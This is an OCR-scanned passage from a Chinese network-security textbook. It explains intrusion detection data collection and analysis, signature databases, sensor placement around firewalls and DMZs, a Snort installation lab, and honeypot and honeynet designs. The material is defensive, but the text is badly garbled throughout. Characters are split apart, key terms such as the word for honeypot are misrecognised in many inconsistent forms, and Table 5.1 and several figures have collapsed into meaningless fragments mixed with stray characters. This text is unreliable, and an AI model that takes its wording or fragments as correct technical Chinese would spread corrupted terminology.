操作 。 因 此 ,一 个 进程 出 现 了 不 期 望 的 行为 可 能 表明 黑客 正在 入 侵 你 的 系统 。 

@ 物理 形式 的 入 侵 信 息 

黑客 总 是 想方设法 突破 网 络 的 周边 防卫 ,以 便 能 够 在 物理 上 访问 内 部 网 ,或 在 内 部 网 上 
安装 他 们 自己 的 设备 和 软件 。 例 如 ,用 户 在 家 里 可 能 安装 Modem 以 访问 远程 办 公 室 , 那 么 
这 一 拨号 访问 就 成 了 威胁 网 络 安全 的 后 门 。 黑 客 就 会 利用 这 个 后 门 来 访问 内 部 网 ,从 而 越 
过 了 内 部 网 络 原 有 的 防护 措施 ,然后 捕获 网 络 流量 ,进而 攻击 其 他 系统 ,并 穷 取 敏感 的 私有 
信息 等 。 

(2) 入 侵 检测 系统 的 数据 收集 机 制 

准确 性 .可靠 性 和 效率 是 入 侵 检 测 系统 数据 收集 机 制 的 基本 指标 ,在 IDS 中 占据 着 举 
足 轻重 的 位 置 。 如 果 收 集 的 数据 时 延 较 大 ,检测 就 会 失去 作用 ;如 果 数 据 不 完整 ,系统 的 检 
测 能 力 就 会 下 降 ; 如 果 由 于 错误 或 人 侵 者 的 行为 致使 收集 的 数据 不 正确 ,IDS 就 会 无 法 检测 
某 些 入侵 ,从 而 给 用 户 以 安全 的 假象 。 

@ 基于 主机 的 数据 收集 和 基于 网 络 的 数据 收集 

基于 主机 的 IDS 是 在 每 台 要 保护 的 主机 后 台 和 运行 一 个 代理 程序 ,检测 主机 和 运行 日 志 
记录 的 未 经 授权 的 可 疑 行径 ,检测 正在 运行 的 进程 是 否 合法 并 及 时 做 出 响应 。 

基于 网 络 的 入 侵 检测 系统 是 在 连接 过 程 中 监视 特定 网 段 的 数据 流 , 查 找 每 一 数据 包 内 
隐藏 的 恶意 人 侵 ,对 发 现 的 和 人 侵 作出 及 时 响应 。 在 这 种 系统 中 ,使 用 网 络 引 擎 执行 监控 任 
务 。 如 图 5. 12 所 示 ,网 络 引擎 所 处 的 位 置 决定 了 所 监控 的 网 段 。 

。 网 络 引擎 配置 在 防火 墙 内 ,可 以 监测 渗透 过 防火 墙 的 攻击 ; 

。 网 络 引擎 配置 在 防火 墙 外 的 非 军事 区 ,可 以 监测 对 防火 墙 的 攻击 ; 

。 网 络 引擎 配置 在 内 部 网 络 的 各 临界 网 段 , 可 以 监测 内 部 的 攻击 。 
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图 5.12 基于 网 络 的 IDS 中 网 络 引擎 的 配置 


控制 台 用 于 监控 全 网 络 的 网 络 引擎 。 为 了 防止 假扮 控制 台 入 侵 或 拦截 数据 ,在 控制 台 
与 网 络 引 擎 之 间 应 创建 安全 通道 。 

基于 网 络 的 人 侵 检测 系统 主要 用 于 实时 监控 网 络 关键 路 径 。 它 的 隐蔽 性 好 、 视 野 宽 、 侦 
测速 度 快 .占用 资源 少 、 实 施 简便 ,并 且 还 可 以 用 单独 的 计算 机 实现 ,不 增加 主机 负担 。 但 难 
于 发 现 所 有 数据 包 , 对 于 加 密 环 境 无 能 为 力 , 用 在 交换 式 以 太 网 上 比较 困难 。 

基于 主机 的 IDS 提供 了 基于 网 络 的 IDS 不 能 提供 的 一 些 功能 ,如 二 进 制 完整 性 检查 、 
记录 分 析 和 非法 进程 关闭 等 。 同 时 由 于 不 受 交换 机 隔离 的 影响 ,在 交换 网 络 中 非常 有 用 。 
但 是 它 对 网 络 流量 不 敏感 ,并 且 由 于 运行 在 后 台 , 不 能 访问 被 保护 系统 的 核心 功能 (不 能 将 
攻击 阻挡 在 协议 层 之 外 )。 它 的 内 在 结构 没有 任何 束缚 ,并 可 以 利用 操作 系统 提供 的 功能 ， 
结合 异常 分 析 , 较 准确 地 报告 攻击 行为 ,而 不 是 根据 网 上 收集 到 的 数据 包 去 猜测 发 生 的 事 
件 。 但 是 它们 往往 要 求 为 不 同 的 平台 开发 不 同 的 程序 ,从 而 增加 了 主机 的 负担 。 

总 之 ,单纯 地 使 用 基于 主机 的 入侵 检测 或 基于 网 络 的 入侵 检测 都 会 造成 主动 防御 体系 
的 不 全 面 。 但 是 ,由 于 它们 具有 互补 性 ,所 以 将 两 种 产品 结合 起 来 ,无 颖 地 部 署 在 网 络 内 ,就 
会 构架 成 综合 了 二 者 优势 的 主动 防御 体系 , 既 可 以 发 现 网 段 中 的 攻击 信息 ,又 可 以 从 系统 日 
志 中 发 现 异 常情 况 。 这 种 系统 一 般 为 分 布 式 , 由 多 个 部 件 组 成 。 

@ 分 布 式 与 集中 式 数据 收集 机 制 

分 布 式 IDS 收集 的 数据 来 自 一 些 固 定位 置 ,而 与 受 监视 的 网 元 数量 无 关 。 集 中 式 IDS 
收集 的 数据 来 自 一 些 与 受 监视 的 网 元 数量 有 一 定 比 例 关系 的 位 置 。 

@ 直接 监控 和 间接 监控 

IDS 从 它 所 监控 的 对 象 处 直接 获得 数据 , 称 为 直接 监控 ;反之 ,如 果 IDS 依赖 一 个 单独 
的 进程 或 工具 获得 数据 , 则 称 为 间接 监控 。 

就 检测 入 侵 行为 而 言 , 直接 监控 要 优 于 间接 监控 ,因为 : 

。 从 非 直接 数据 源 获取 的 数据 在 被 IDS 使 用 之 前 ,入 侵 者 还 有 进行 修改 的 潜在 机 会 。 

。 非 直接 数据 源 可 能 无 法 记录 某 些 事件 ,例如 它 无 法 访问 监视 对 象 的 内 部 信息 。 

。 在 间接 监控 中 ,数据 一 般 都 是 通过 某 种 机 制 (如 编写 审计 代码 ) 生 成 的 ,但 这 些 机 制 

并 不 是 IDS 的 具体 要 求 , 因 而 从 间接 数据 源 获得 的 数据 量 要 比 从 直接 数据 源 获得 的 
数据 量 大 得 多 。 并 且 间 接 监 控 机 制 的 可 伸缩 性 小 ,一 旦 主机 及 其 内 部 被 监控 要 素 增 
" Bl 汉 


加 ,过 滤 数 据 的 开销 会 降低 监控 主机 的 性 能 。 
。 间接 数据 源 的 数据 从 产生 到 IDS 访问 之 间 有 一 个 时 延 。 
但 是 由 于 直接 监控 操作 的 复杂 性 ,目前 的 IDS 产品 中 只 有 不 足 20% 使 用 了 直接 监控 


机 制 。 


@ 外 部 探测 器 和 内 部 探测 器 
外 部 探测 器 的 监控 组 件 (程序 ) 独 立 于 被 监测 各 组 件 ( 硬 件 或 软件 ?的 实现 。 内 部 探测 器 
的 监控 组 件 (程序 ) 附 加 于 被 监测 各 组 件 ( 硬 件 或 软件 ) 的 实现 。 表 5. 1 给 出 了 它们 的 优 缺 点 


比较 。 
表 5.1 外 部 探测 器 和 内 部 探测 器 的 优 缺 点 
比较 内 容 外 部 探测 器 内 部 探测 器 
。 代 理 消耗 了 过 最 资源 ， 。 要 嵌入 被 监控 程序 中 ,修改 被 监控 程序 时 
AAA | 。 库 调用 错误 地 修改 了 某 些 | 。 容易 引进 错误 。 
WO 对 策 : 探测 器 代码 尽量 短 。 
。 有 被 入 侵 者 修改 的 潜在 可 能 “| 。 不 是 分 离 进程 ,不 易 被 禁止 或 修改 
好 : 
， 探 测 器 程序 与 被 监控 程序 | 
， 分 离 ， 本 
可 实现 性 可 使 用 有 。 需要 集成 到 被 监视 程序 中 ,难度 较 大 
性 .可 维护 性 挫 演 仙 夺 中 下 人 生生 或” | 。 需 要 使 用 与 被 监视 程序 相同 的 编程 语言 
“可 以 利用 任何 合适 的 编程 | ”设计 要 求 高 ,修改 .升级 难度 大 
语言 
小 : 
ee 关 。 数据 的 产生 和 使 用 之 间 的 时 延 小 
数据 生成 和 使 用 之 间 存 在 时 延 “| 。 不 是 分 离 进程 ,避免 了 创建 进程 的 主机 
开销 
关 ed 
完备 性 可 以 放 贤 在 所 监视 程序 的 任何 地 方 
Nd ae 可 以 访问 所 监视 程序 中 的 任何 信息 
只 能 根据 可 获 数据 作出 基于 经 | ， 二 
正确 性 Be 较 完全 
2. 数据 分 析 


数据 分 析 是 IDS 的 核心 , 它 的 功能 就 是 对 从 数据 源 提 供 的 系统 运行 状态 和 活动 记录 进 
行 同步 ,整理 .组 织 ` 分 类 以 及 各 种 类 型 的 细致 分 析 , 提 取 其 中 包含 的 系统 活动 特征 或 模式 ， 
用 于 对 正常 和 异常 行为 的 判断 。 
入 侵 检测 系统 的 数据 分 析 技 术 依 检测 目标 和 数据 属性 ,分 为 异常 发 现 技 术 和 模式 发 现 


技术 两 大 类 。 最 近 几 年 还 出 现 了 一 些 通用 的 技术 。 


(1) 异常 发 现 技术 
异常 发 现 技术 用 在 基于 异常 检测 的 IDS 中 。 如 图 5. 13 所 示 ,在 这 类 系统 中 ,观测 到 的 
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不 是 已 知 的 入 侵 行为 ,而 是 所 监视 通信 系统 中 的 异常 现象 。 如 果 建 立 了 系统 的 正常 行为 轨 
迹 , 则 在 理论 上 就 可 以 把 所 有 与 正常 轨迹 不 同 的 系统 状态 视 为 可 疑 企图 。 由 于 正常 情况 具 
有 一 定 的 范围 ,因此 正确 地 选择 异常 阔 值 和 特征 ,决定 何 种 程度 才 是 异常 ,是 异常 发 现 技术 
的 关键 。 


Ee 
部 
昔 


系统 审计 比较 器 


图 5.13 异常 检测 模型 


异常 检测 只 能 检测 出 那些 与 正常 过 程 具有 较 大 偏差 的 行为 。 由 于 对 各 种 网 络 环境 的 适 
应 性 较 弱 , 且 缺 乏 精 确 的 判定 准则 ,异常 检测 有 可 能 出 现 虚报 现象 。 

异常 发 现 技术 包括 表 5. 2 所 示 的 一 些 。 其 中 ,自学 习 系统 通过 学 习 事例 构建 正常 行为 
模型 ,又 可 分 为 时 序 和 非 时 序 两 种 ;可 编程 系统 需要 通过 程序 测定 异常 事件 ,让 用 户 知道 哪 
些 是 足以 破坏 系统 安全 的 异常 行为 ,又 可 分 为 描述 统计 和 默认 否定 两 类 。 


表 5.2 异常 发 现 技术 


类 型 方 ”法 系统 名 称 
非 时 序 规则 建 模 Wisdom & Sense 
自学 习 型 描述 统计 IDESNIDES`EMERRALD JiNao、Haystack 
时 序 人 工 神经 网 络 Hyperview 
简单 统计 MIDAS、NADIR Haystack 
描述 统计 基于 简单 规则 NSM 
可 编程 型 
门限 Computer-watch 
默认 否定 状态 序列 建 模 DPEM Janus、Bro 


(2) 模式 发 现 技术 
模式 发 现 又 称 特征 检测 或 滥用 检测 。 如 图 5. 14 所 示 ,它们 是 基于 已 知 系统 缺陷 和 入 侵 
模式 , 即 事先 定义 了 一 些 非 法 行为 ,然后 将 观察 现象 与 之 比较 作出 判断 。 这 种 技术 可 以 准确 


正常 活动 
不 符合 
系统 审计 模式 鉴别 > 
符合 


图 5.14 误 用 检测 模型 
A 


地 检测 具有 某 些 特征 的 攻击 ,但 是 由 于 过 度 依赖 实现 定义 好 的 安全 策略 ,而 无 法 检测 系统 未 
知 的 攻击 行为 ,因而 可 能 产生 漏 报 。 

模式 发 现 技术 通 过 对 确 知 的 决策 规则 编程 实现 ,常用 的 技术 有 如 下 4 种 。 

a 状态 建 模 : 状态 建 模 将 人 侵 行为 表示 成 许多 个 不 同 的 状态 。 如 果 在 观察 某 个 可 疑 
行为 期 间 , 所 有 状态 都 存在 , 则 判定 为 恶意 人 侵 。 状 态 建 模 从 本 质 上 来 讲 是 时 间 序 列 模型 ， 
可 以 再 细 分 为 状态 转换 和 Petri 网 ,前 者 将 入 侵 行为 的 所 有 状态 形成 一 个 简单 的 遍历 链 , 后 
者 将 所 有 的 状态 构成 一 个 更 广义 的 树 形 结构 的 Petri 网 。 

@ 串 匹 配 : 串 匹配 通过 对 系统 之 间 传 输 的 或 系统 自身 产生 的 文本 进行 子 串 匹 配 实现 。 
该 方法 灵活 性 欠 差 ,但 易于 理解 ,目前 有 很 多 高 效 的 算法 ,其 执行 速度 很 快 。 

@ 专家 系统 : 专家 系统 可 以 在 给 定 人 侵 行为 描述 规则 的 情况 下 ,对 系统 的 安全 状态 进 
行 推理 。 一 般 情况 下 ,专家 系统 的 检测 能 力 强 大 ,灵活 性 也 很 高 ,但 计算 成 本 较 高 ,通常 以 降 
低 执行 速度 为 代价 。 

@ 基于 简单 规则 : 类 似 于 专家 系统 ,但 相对 简单 一 些 , 执 行 速 度 快 。 

(3) 混合 检测 

近 几 年 来 ,混合 检测 日 益 受 到 人 们 的 重视 。 这 类 检测 在 作出 决策 之 前 , 既 分 析 系统 的 正 
常 行为 ,同时 还 观察 可 疑 的 人 侵 行为 ,所 以 判断 更 全 面 、 准 确 . 可 靠 。 它 通常 根据 系统 的 正常 
数据 流 背 景 来 检测 入 侵 行为 , 故 也 有 人 称 其 为 “启发 式 特征 检测 ”。 属 于 这 类 检测 的 技术 有 : 
人 工 免疫 方法 ;遗传 算法 ;数据 挖掘 等 。 


3. 入 侵 检 测 系 统 的 特征 库 


IDS 要 有 效 地 捕捉 入 侵 行 为 ,必须 拥有 一 个 强大 的 入 侵 特征 (signature) 数 据 库 , 这 就 如 
同 公 安 部 门 必 须 拥 有 健全 的 罪犯 信息 库 一 样 。 

IDS 中 的 特征 就 是 指 用 于 判别 通信 信息 种 类 的 样板 数据 ,通常 分 为 多 种 ,以 下 是 一 些 典 
型 情况 及 其 识别 方法 。 

。 来自 保留 IP 地 址 的 连接 企图 : 可 通过 检查 IP 报头 (IP header) 的 来 源 地 址 进行 

识别 。 

。 带 有 非法 TCP 标志 联合 物 的 数据 包 : 可 通过 TCP 报头 中 的 标志 集 与 已 知 正确 和 错 

误 标记 联合 物 的 不 同 点 来 识别 。 

。 含有 特殊 病毒 信息 的 E-mail: 可 通过 对 比 每 封 E-mail 的 主题 信息 和 病态 E-mail 的 

主题 信息 来 识别 ,或 者 通过 搜索 特定 名 字 的 外 延 来 识别 。 

。 查询 负载 中 的 DNS 缓冲 区 溢出 企图 : 可 通过 解析 DNS 域 及 检查 每 个 域 的 长 度 来 
识别 。 另 外 一 个 方法 是 在 负载 中 搜索 “ 壳 代 码 利 用 ”(exploit shellcode) 的 序列 代码 
组 合 。 

对 POP3 服务 器 大 量 发 出 同一 命令 而 导致 DoS 攻击 : 通过 跟踪 记录 某 个 命令 连续 
发 出 的 次 数 , 看 是 否 超过 了 预 设 上 限 ,而 发 出 报警 信息 。 

。 未 登录 情况 下 使 用 文件 和 目录 命令 对 FTP 服务 器 的 文件 访问 攻击 : 通过 创建 具备 
状态 跟踪 的 特征 样板 以 监视 成 功 登 录 的 FTP 对话, 发现 未 经 验证 却 发 命令 的 人 侵 
企图 。 
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显然 ,特征 的 涵盖 范围 很 广 , 有 简单 的 报头 域 数值 有 高 度 复杂 的 连接 状态 跟踪 、 有 扩展 
的 协议 分 析 。 

此 外 ,不 同 的 IDS 产品 具有 的 特征 功能 也 有 所 差异 。 例 如 ,有 些 网 络 IDS 系统 只 允许 
很 少 地 定制 存在 的 特征 数据 或 者 编写 需要 的 特征 数据 ,另外 一 些 则 允许 在 很 宽 的 范围 内 定 
制 或 编写 特征 数据 ,甚至 可 以 是 任意 一 个 特征 。 一 些 IDS 系统 ,只 能 检查 确定 的 报头 或 负 
载 数值 ,另外 一 些 则 可 以 获取 任何 信息 包 的 任何 位 置 的 数据 。 


4. 响应 


早期 的 入 侵 检测 系统 的 研究 和 设计 把 主要 精力 放 在 对 系统 的 监控 和 分 析 上 ,而 把 响应 
的 工作 交 给 用 户 完成 。 现 在 的 入侵 检测 系统 都 提供 响应 模块 ,并 提供 主动 响应 和 被 动 响应 
两 种 响应 方式 。 一 个 好 的 入侵 检测 系统 应 该 让 用 户 能 够 裁减 定制 其 响应 机 制 ,以 符合 特定 
的 需求 环境 。 

(1) 主动 响应 

在 主动 响应 系统 中 ,系统 将 自动 或 以 用 户 设置 的 方式 阻 断 攻击 过 程 或 以 其 他 方式 影响 
攻击 过 程 ,通常 可 以 选择 的 措施 有 

。 针对 入 侵 者 采取 的 措施 ， 


。 修 正 系统 ; 本 国 
。 收集 更 详细 的 信息 。 1 
(2) 被 动 响应 确定 安全 需求 
在 被 动 响应 系统 中 ,系统 只 报告 和 记录 发 
生 的 事件 。 L 
设计 IDE 的 拓扑 


5.3.4 入 侵 检测 系统 的 实现 
1. 入 侵 检 测 系统 的 设置 4 
了 


网 络 安全 需要 各 个 安全 设备 的 协同 工作 和 


| 


正确 设置 。 由 于 入侵 检测 系统 位 于 网 络 体系 中 配置 系统 
的 高 层 ,高 层 应 用 的 多 样 性 导致 了 入侵 检测 系 | 调整 参数 | 
统 分 析 的 复杂 性 和 对 计算 资源 的 高 需求 。 在 这 侣 调试 
种 情形 下 ,对 入 侵 检测 设备 进行 合理 的 优化 设 
四 ,可 以 使 人 侵 检测 系统 更 有 效 地 运行 。 
图 5.15 是 入 侵 检测 系统 设置 的 基本 过 程 。 - 
从 图 5. 15 可 以 看 出 ,入 侵 检 测 系统 的 设置 皇 
需要 经 过 多 次 回溯 及 反复 调整 。 使 用 
2. 在 基于 网 络 的 入 侵 检测 系统 中 部 署 入 天 
侵 检 测 器 安全 更 新 ? 
基于 网 络 的 入 侵 检测 系统 主要 检测 网 络 数 ”图 5.15 入 侵 检测 系统 设置 的 基本 过 程 
硬汉 


据 报 文 , 因 此 一 般 将 检测 器 部 署 在 靠近 防火 墙 的 地 方 。 具 体 做 法 有 如 图 5. 16 所 示 的 几 个 
位 置 。 


“关键 了 网、) 


十 ~# - 
| 月 | 四 | 内 部 网 检测 器 (5) 
| ET 


检测 器 (3)(4) 检测 器 (1) 检测 器 (2)(4) 
图 5.16 基于 网 络 的 人 侵 检 测 器 的 部 署 


(1) DMZ 区 内 

在 这 里 可 以 检测 到 的 攻击 行为 是 所 有 针对 向 外 提供 服务 的 服务 器 的 攻击 。 由 于 DMZ 
中 的 服务 器 是 外 部 可 见 的 ,因此 在 这 里 检测 最 为 需要 。 同 时 ,由 于 DMZ 中 的 服务 器 有 限 ， 
所 以 针对 这 些 服务 器 的 检测 ,可 以 使 人 侵 检测 器 发 挥 最 大 优势 。 但 是 ,在 DMZ 中 ,检测 器 
会 暴露 在 外 部 ,而 失去 保护 ,遭受 攻击 ,导致 无 法 工作 。 

(2) 内 网 主干 (防火 墙 内 侧 ) 

将 检测 器 放 到 防火 墙 的 内 侧 , 有 如 下 几 点 好 处 : 

。 检测 器 比 放 在 DMZ 中 安全 。 

。 所 检测 到 的 都 是 已 经 渗透 过 防火 墙 的 攻击 行为 。 从 中 可 以 有 效 地 发 现 防 火 墙 配置 

的 失误 。 

。 可 以 检测 到 内 部 可 信用 户 的 越权 行为 。 

。 由 于 受 干扰 的 机 会 少 ,报警 几率 也 少 。 

(3) 外 网 入 口 ( 防 火 墙 外 侧 》 

优势 是 : 

。 可 以 对 针对 目标 网 络 的 攻击 进行 计数 ,并 记录 最 为 原始 的 数据 包 。 

。 可 以 记录 针对 目标 网 络 的 攻击 类 型 。 

但 是 ,不 能 定位 攻击 的 源 和 目的 地 址 ,系统 管理 员 在 处 理 攻 击 行为 上 也 有 难度 。 

(4) 在 防火 墙 的 内 外 都 放置 

这 种 位 置 可 以 检测 到 内 部 攻击 ,又 可 以 检测 到 外 部 攻击 ,并且 无 须 猜 测 攻击 是 否 穿越 防 
火 墙 ,但 是 ,开销 较 大 。 在 经 费 充足 的 情况 下 是 最 理想 的 选择 。 

(5) 关键 子 网 

这 个 位 置 可 以 检测 到 对 系统 关键 部 位 的 攻击 ,将 有 限 的 资源 用 在 最 值得 保护 的 地 方 , 获 
得 最 大 效益 或 投资 比 。 


3. 在 基于 主机 的 入 侵 检测 系统 中 部 署 入 侵 检 测 器 


基于 主机 的 入 侵 检测 系统 通常 是 一 个 程序 。 在 基于 网 络 的 入 侵 检 测 器 的 部 署 和 配置 完 
成 后 ,基于 主机 的 入 侵 检 测 将 部 署 在 最 重要 、 最 需要 保护 的 主机 上 。 
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4. 报警 策略 


要 确定 。 例 如 : 


Sa3, 


对 一 般 性 服务 企业 ,报警 集中 在 已 知 的 有 威胁 的 攻击 行为 上 ; 
对 关键 性 服务 企业 ,需要 将 尽 可 能 多 的 报警 记录 并 对 部 分 认定 的 报警 
反馈 。 


5 入 侵 检 测 产品 的 选择 


1. 购买 入 侵 检测 系统 考虑 的 基本 因素 


。 实 时 性 。 

。 自动 反应 能 力 。 

。 能 检测 到 所 有 事件 ,不 会 发 生 遗 漏 警报 。 
。 跨 平台 性 好 ,能 在 多 种 平台 上 运行 。 


2. 理想 的 入 侵 检 测 系统 的 几 个 特点 


。 快速 控制 。 

。 良好 的 误 报警 管理 。 
”显示 过 滤器 。 

。 标志 已 经 分 析 过 的 事件 。 
。 层 层 探究 的 能 力 。 

， 关联 分 析 能 力 。 
”报告 能 力 。 


实验 17 构建 一 个 IDS 


1. 实验 目的 


(1) 了 解 目前 IDS 产品 的 发 展 情 况 。 
(2) 掌握 一 种 IDS 的 安装 .配置 和 使 用 方法 。 


2. 实验 内 容 
(1) 安装 一 种 IDS 的 最 新 版 本 。 例 如 ， 


。 Snort 的 最 新 版 本 ; 


进 


和 


。 LIDS(Linux 人 侵 检测 系统 ) 是 Linux 内 核 补丁 和 系统 管理 员工 具 (lidsadm); 


。 其 他 。 


(2) 使 用 安装 的 IDS 对 一 个 系统 (网 络 ) 进 行 测试 。 
(3) 对 检测 结果 进行 评价 。 


检测 到 入 侵 行为 需要 报警 。 具 体 报警 的 内 容 和 方式 需要 根据 整个 网 络 的 环境 和 安全 需 


了 实时 
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(4) 针对 测试 结果 提出 应 对 措施 。 
3. 实验 范例 一 一 Snort 及 其 使 用 


Snort 是 目前 应 用 最 为 广泛 的 一 个 IDS 产品 。 它 是 一 个 轻 量 级 的 网 络 人 侵 检测 系统 ， 
即 指 该 软件 在 运行 的 时 候 只 占用 极 少 的 网 络 资源 ,对 原 有 网 络 性 能 影响 很 小 。Snort 有 如 
下 一 些 功 能 : 

。 实时 通信 分 析 和 信息 包 记 录 ; 

。 包装 有 效 载荷 检查 ; 

。 协议 分 析 和 内 容 查 询 匹 配 ; 

。 探测 缓冲 区 溢出 秘密 端口 扫描 、CGI 攻击 、SMB 探测 .操作 系统 侵入 尝试 ; 

。 对 系统 日 志 、 指 定 文件 .UNIX socket 或 通过 Samba 的 WinPopus 进行 实时 报警 。 

Snort 是 一 个 跨 平 台 软 件 ,所 支持 的 操作 系统 非常 广泛 ,比如 , Windows、Linux、SunOS 
等 都 支持 。 在 Windows 下 安装 比较 简单 : 首先 下 载 Windows 下 网 络 数 据 包 捕 获 工具 Win- 
Pcap ,然后 下 载 Snort 安装 包 , 直接 双击 即 可 。 

安装 Snort 所 需 的 软件 包 及 其 下 载 网 址 见 表 5. 3 所 示 。 


表 5.3 安装 Snort 需要 的 软件 包 


软件 包 网 址 说 明 
LibPcap http://www. tcpdump. org/release// 捕 包 程序 库 
Snort http://www. snort. org/dl/ 
http://www. snort. org/dl/rules/snortrules- 
SnortRules 
snapshot-2_2. tar. gz 
OpenSSL http://www. openssl. org/source/openssl- 实现 SSL 和 TLS 
0. 9.7d. tar. gz 
Stunnel http://www. stunnel. org/download/source. 建立 并 维护 加 密会 话 
html 
ACID http://acidlab. sourceforge. net 基于 Web 的 入 侵 事件 数据 库 分 析 控 制 台 
mod_ssl http://www. modssl. org/source/ Apache 与 OpenSSL 之 间 的 接口 
gd http://www. boutell. com/gd/ 图 形 库 
ADODB http://php. weblogs. com/ ADODB 为 ACID 提供 便捷 的 数据 库 接口 
Phplot ACID | http://www. phplot. com 所 依赖 的 制图 库 
ihe http://www. apache. org/dyn/closer. cgi/ Web 服务 器 
httpd/ 
MySQL http://www. mysql. com/download/mir- 入 侵 事件 数据 库 
rors. html 
PHP(v>4.2) | http://www. php. net 应 用 程序 服务 器 


使 用 Snort 需要 经 过 下 面 的 一 些 安装 过 程 。 
(1) 安装 OpenSSL。 
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(2) 安装 并 配置 Stunnel。 
(3) 安装 并 配置 MySQL 。 
(4) 用 户 和 数据 库 初 始 化 。 
(5) 配置 mod_ssl。 

(6) 安装 gd。 

(7) 安装 并 配置 PHP。 

(8) 安装 Apache。 

(9) 安装 ADODB。 

(10) 安装 ACID。 

(11) 安装 LibPcap。 

(12) 安装 OpenSSL。 

(13) 安装 并 配置 Stunnel。 
(14) 安装 MySQL 客户 端 。 
(15) 安装 Snort。 

(16) 配置 snort. conf。 
(17) 配置 规则 集 。 

(18) 使 用 Snort。 

Snort 有 3 种 工作 模式 : 嗅 探 器 .数据 包 记 录 器 、 网 络 人 侵 检 测 系 统 。 


4. 实验 准备 


(1) 查找 关于 IDS 产品 的 有 关 资 料 。 

(2) 从 免费 的 IDS 产品 中 选择 一 种 合适 的 产品 。 

(3) 设计 所 选择 IDS 的 安装 环境 和 步骤 。 

(4) 设计 对 所 选择 IDS 产品 进行 测试 的 测试 用 例 .环境 和 步 又。 
(5) 设计 实验 中 的 应 急 预 案 。 

5. 推荐 的 分 析 讨 论 内 容 


(1) IDS 产品 除了 进行 入 侵 检测 ,还 能 做 什么 ? 
(2) 其 他 发 现 或 想到 的 问题 。 


5.4 网 络 诱 骗 
5.4.1 窗 钠 


1. 密 摊 的 特点 


网 络 诱骗 技术 的 核心 是 蜜 铅 (honey pot)。 它 是 运行 在 Internet 上 的 充满 诱惑 力 的 计 
算 机 系统 。 这 种 计算 机 系统 有 如 下 一 些 特 点 : 
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” 蜜 饶 是 一 个 包含 有 漏洞 的 诱骗 系统 , 它 通 过 模拟 一 个 或 多 个 易 受 攻击 的 主机 给 攻击 
者 提供 一 个 容易 攻击 的 目标 。 

。 蜜 饶 不 向 外 界 提供 真正 有 价值 的 服务 。 

所 有 与 密 饶 的 连接 尝试 都 被 视 为 可 疑 的 连接 。 


2. 密 缸 的 目的 


蜜 钠 可 以 实现 如 下 目的 : 
。 引诱 攻击 ,拖延 对 真正 有 价值 目标 的 攻击 ; 
。 消耗 攻击 者 的 时 间 , 以 便 收集 信息 ,获取 证 据 。 


3. 密 缸 的 主要 形式 


下 面 介 绍 蜜 镀 的 3 种 主要 形式 。 

(1) 空 系统 

空 系统 是 一 种 没有 任何 虚假 和 模拟 环境 的 完全 真实 的 计算 机 系统 ,但 是 有 真实 的 操作 
系统 和 应 用 程序 ,也 有 真实 的 漏洞 。 这 是 一 种 简单 的 蜜 饶 主机 。 

但 是 , 空 系统 (以 及 模拟 系统 ) 会 很 快 被 攻击 者 发 现 ,因为 他 们 会 发 现 这 不 是 期 待 的 
目标 。 

(2) 镜像 系统 

建立 一 些 提供 Internet 服务 的 服务 器 镜像 系统 ,会 让 攻击 者 感到 真实 ,也 就 更 具有 欺骗 
性 。 另 一 方面 ,由 于 是 镜像 系统 ,所 以 比较 安全 。 

(3) 虚拟 系统 

虚拟 系统 是 在 一 台 真 实 的 物理 机 器 上 运行 一 些 仿真 软件 ,模拟 出 多 台 虚 拟 机 ,构建 多 个 
蜜 饶 主 机 。 这 种 虚拟 系统 不 但 逼真 ,而 且 成 本 较 低 ,资源 利用 率 较 高 。 此 外 ,即使 攻击 成 功 ， 
也 不 会 威胁 宿主 操作 系统 的 安全 。 


5.4.2 密 网 技术 


蜜 网 (honey net) 技 术 也 称 陷阱 网 络 技术 。 它 由 多 个 蜜 色 主 机、 路由器、 防火 墙 \IDS、 审 
计 系 统 等 组 成 ,为 攻击 者 制造 一 个 攻击 环境 , 供 防御 者 研究 攻击 者 的 攻击 行为 。 


1. 第 一 代 密 网 


图 5. 17 为 第 一 代 蜜 网 结构 图 。 
下 面 对 其 中 各 部 件 的 作用 加 以 介绍 。 
(1) 防火 墙 
防火 墙 隔离 内 网 和 外 网 ,防止 人 侵 者 以 蜜 网 作为 跳板 攻击 其 他 系统 。 其 配置 规则 为 : 
不 限制 外 网 对 蜜 网 的 访问 ,但 需要 对 蜜 镀 主 机 对 外 的 连接 予以 控制 ,包括 : 
。 限制 对 外 连接 的 目的 地 ; 
。 限制 蜜 钠 主 机 主动 对 外 连接 ; 
。 限制 对 外 连接 的 协议 等 。 
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安全 管理 子 网 


图 5.17 第 一 代 蜜 网 结构 


(2) 路 由 器 

路 由 器 放 在 防火 墙 与 蜜 网 之 间 ,利用 路 由 器 具有 控制 功能 来 弥补 防火 墙 的 不 足 , 例 如 防 
止 地 址 欺骗 攻击 .DoS 攻击 等 。 

(3) IDS 

IDS 是 蜜 网 中 的 数据 捕获 设备 ,用 于 检测 和 记录 网 络 中 可 疑 的 通信 连接 ,报警 可 疑 的 网 
络 活动 。 

2. 第 二 代 蜜 网 


图 5. 18 为 第 二 代 蜜 网 结构 图 。 


器 


ee hub 
蜜 网 探测 器 受 保护 子 网 


图 5.18 第 二 代 蜜 网 结构 


第 二 代 蜜 网 技术 将 数据 控制 和 数据 捕获 集中 到 蜜 网 探测 器 中 进行 。 这 样 , 带 来 的 好 
处 是 : 
。 便于 安装 和 管理 ; 
。 隐蔽 性 更 强 ; 
。 可 以 监控 非 授 权 活动 ; 
。 可 以 采取 积极 的 响应 方法 限制 非法 活动 的 效果 ,如 修改 攻击 代码 字 节 ,使 攻击 失 
效 等 。 
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3. 第 三 代 密 网 


第 三 代 蜜 网 是 目前 正在 开发 的 蜜 网 技术 。 它 是 建立 在 一 个 物理 设备 上 的 分 布 式 虚拟 系 
统 。 如 图 5. 19 所 示 , 这 样 就 把 蜜 钠 \ 数 据 控制 .数据 捕获 、 数 据 记 录 等 都 集中 到 一 台 物 理 的 
设备 上 。 


虚拟 系统 | 虚拟 系统 和 虚拟 系统 
宿主 机 系统 


图 5.19 第 三 代 蜜 网 结构 


5.4.3 常见 网 络 诱骗 工具 及 产品 


1. 蜜 缸 实现 工具 


(1) winetd 

winetd 是 一 个 在 Windows 上 实现 蜜 饶 的 简单 工具 。 它 安装 简单 ,界面 友好 ,适合 初学 
者 使 用 ;但 确定 过 于 简单 ,不 能 真正 诱骗 攻击 者 进入 。 

(2) DTK 

DTK(deception tool kit, 可 以 从 http: //all. net/dtk/ 网 站 下 载 ) 是 用 C 语言 和 Perl 脚 
